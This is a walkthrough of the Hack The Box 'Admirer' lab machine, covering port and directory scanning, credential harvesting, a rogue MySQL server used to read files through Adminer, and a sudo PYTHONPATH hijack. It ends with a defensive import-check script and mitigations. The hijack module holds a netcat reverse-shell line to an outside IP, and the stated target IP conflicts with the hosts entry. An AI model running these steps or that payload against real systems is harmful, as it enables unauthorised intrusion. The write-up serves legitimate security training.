Looking for a detailed walkthrough of the Admirer machine on Hack The Box? In this article, we take a step-by-step look at the process of identifying and exploiting vulnerabilities to achieve remote code execution (RCE). Hack The Box is a popular cybersecurity training and practice platform. The Admirer machine offers a complex challenge that requires the researcher to have the skills to gather information, analyze data, and exploit vulnerabilities.
This machine has an IP address of 10.10.10.189, which we add to /etc/hosts.
10.10.10.187 admirer.htb
First, a scan of open ports is performed. To speed up the process, instead of using nmap to scan all ports, the scan is performed using masscan. All TCP and UDP ports are analyzed via the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.187 --rate=500
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A admirer.htb -p80,22,21
Based on the results of the nmap scan, a further course of action is determined. FTP and SSH services that require credentials are detected on the server, as well as an Apache web server. The robots.txt file is available on the web server, which contains a single entry — the admin-dir directory. Due to the lack of additional information, the next step is to scan the directories.
For this purpose, a quick tool called gobuster is used. The parameters specify:
scan type — directories (dir);
site URL (-u);
dictionary to scan (-w);
required file extensions (-x);
number of threads (-t).
gobuster dir -t 128 -u http://admirer.htb/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
We find two files: the first contains email addresses, and the second contains various credentials.
And among the credentials we find a set for FTP. We connect.
Let's look at what is on the server.
We download all the files.
This archive looks like a backup of the site; let's unpack it and see what's in it.
mkdir HTML
mv html.tar.gz HTML/
cd HTML
tar -xf html.tar.gz
The first file is identical to the one already on the site, but the credentials file contains some that we haven't seen yet.
Attempts to use them fail. Let's search all the downloaded files for the strings user and pass.
grep -R -i "user\|pass" ./
Two more passwords for the same user were discovered. All available credentials were collected.
But they didn't get us anywhere.
When we try to perform actions that are not permitted on the site, we get a refusal.
Since all executable files are located in the utility-scripts directory, let’s scan it on the host, looking for php files.
gobuster dir -t 128 -u http://admirer.htb/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php
We find the file admirer.php.
After searching for information, the following sources made it clear how to get an RCE. If you specify your host as the server, you can see a connection attempt.
Start the mysql service on the local host.
sudo service mysql start
sudo mysql -u root
And let's create a user for authorization.
create user ralfadmirer@'%' identified by 'ralfadmirer';
create database admirerdb;
grant all privileges on admirerdb.* to 'ralfadmirer';
The configuration file /etc/mysql/mariadb.conf.d/50-server.cnf is modified to allow access to the host. To do this, the bind-address line is commented out, after which the service is restarted.
sudo service mysql restart
We log in on behalf of the newly created user.
We select our database.
Next, let’s create a table.
And we will execute an SQL query to read the index.php file, where we can find the credentials (as it was in the backup).
load data local infile '../index.php' into table admirerdb.admirertable fields terminated by '\n';
Now let's look at the table we created.
And we find the credentials.
SSH authentication was successfully completed using this password.
Check the sudo settings.
Thus, this script can be executed as a superuser. During its analysis, a call to a Python script was detected, which is also executed with sudo privileges.
And the script itself uses an import that is resolved through Python's module search path rather than a fixed location.
The environment variables that sudo keeps are checked, and they include Python's module search path (PYTHONPATH).
# Module placed on the attacker-controlled PYTHONPATH; its make_archive shadows the one the privileged script expects to import
def make_archive():
    import os
    os.system('nc 10.10.15.110 4321 -e "/bin/sh"')

make_archive()
Let’s run the script.
sudo PYTHONPATH='/tmp/' /opt/scripts/admin_tasks.sh
We get a reverse shell.
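The root cause of the final step is that a privileged script trusts whatever module the search path hands it. The following added example (not code from the write-up or from the machine) shows how such a script can verify, before doing any privileged work, that each module it relies on resolves to the interpreter's own standard library; the shadow directory and the dummy shutil.py it creates are constructed for the demonstration.

```python
"""Check that a privileged script's imports come from the interpreter's stdlib,
not from a directory prepended through PYTHONPATH (added example)."""
import importlib.machinery
import os
import sys
import sysconfig
import tempfile

# Directory of the interpreter's own standard library, e.g. /usr/lib/python3.11
STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def resolve_module(name, search_path=None):
    """Locate `name` the way `import` would on `search_path` (default: sys.path).
    PathFinder is used directly so that a copy already in sys.modules cannot mask
    a shadowing file that a different search path would pick up first."""
    if name in sys.builtin_module_names:
        return "built-in"
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or spec.origin is None:
        return None
    return os.path.realpath(spec.origin)


def is_trusted_import(name, search_path=None):
    """True only if `name` is built-in or its file lives inside STDLIB_DIR."""
    origin = resolve_module(name, search_path)
    if origin == "built-in":
        return True
    if origin is None:
        return False
    return origin.startswith(STDLIB_DIR + os.sep)


def verify_imports(names, search_path=None):
    """Return the modules that do NOT resolve to a trusted location."""
    return [n for n in names if not is_trusted_import(n, search_path)]


def demo_shadowed_shutil():
    """Constructed scenario: an extra directory (what a preserved PYTHONPATH would
    prepend) holds a shutil.py. Returns the flagged modules for the clean search
    path and for the hijacked one."""
    with tempfile.TemporaryDirectory() as extra:
        with open(os.path.join(extra, "shutil.py"), "w") as f:
            f.write("# constructed shadow module for the demo; it does nothing\n")
        clean_path = [STDLIB_DIR]
        hijacked_path = [extra] + clean_path
        return (verify_imports(["shutil", "os"], clean_path),
                verify_imports(["shutil", "os"], hijacked_path))
```

The more direct fixes are to not let sudo preserve PYTHONPATH (sudo's default env_reset already strips it) or to start the interpreter with -E or -I so that environment variables are ignored.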
The article describes in detail the process of exploiting vulnerabilities on the Hack The Box Admirer machine. Using a sequential approach — from port scanning and searching for hidden directories to script analysis and manipulation of environment variables — it was possible to gain complete control over the system. This experience demonstrates the importance of careful study of configurations and working with access rights in the field of cybersecurity.